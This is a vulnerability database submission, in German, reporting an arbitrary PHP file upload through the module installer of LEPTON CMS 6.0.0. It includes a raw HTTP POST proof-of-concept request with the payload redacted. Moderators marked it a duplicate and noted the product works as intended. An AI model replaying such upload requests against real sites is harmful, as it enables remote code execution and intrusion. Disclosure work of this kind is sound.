| Titel | https://lepton-cms.org/ leptoncms 6.0.0 Arbitrary File Upload |
|---|
| Beschreibung | Menu ->add ons ->modules ->install (Upload a PHP file containing malicious code)
POST /LEPTON6.0.0/upload/backend/modules/install.php?leptoken=8ca7e18fb30dc95ac7874z1753067977 HTTP/1.1
Host: 127.0.0.1:81
Content-Length: 605
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="127", "Not)A;Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryh6XBRla9BlNIaIyi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: lep4399sessionid=60na1cdmru74b80iui1p4oar3c; cookieconsent_status=dismiss
Connection: keep-alive
------WebKitFormBoundaryh6XBRla9BlNIaIyi
Content-Disposition: form-data; name="userfile"; filename="ctfshow.zip"
Content-Type: application/x-zip-compressed
xxxxxxxxxxx
------WebKitFormBoundaryh6XBRla9BlNIaIyi
Content-Disposition: form-data; name="submit"
Install
------WebKitFormBoundaryh6XBRla9BlNIaIyi-- |
|---|
| Quelle | ⚠️ http://127.0.0.1/LEPTON6.0.0/upload/backend/modules/install.php?leptoken=8ca7e18fb30dc95ac7874z1753067977 |
|---|
| Benutzer | liule960117 (UID 88729) |
|---|
| Einreichung | 05.08.2025 11:45 (vor 9 Monaten) |
|---|
| Moderieren | 09.08.2025 11:57 (4 days later) |
|---|
| Status | Duplikat |
|---|
| VulDB Eintrag | 259032 [Lepton 7.1.0 PHP File erweiterte Rechte] |
|---|
| Erklärung | product works as intended |
|---|
| Punkte | 0 |
|---|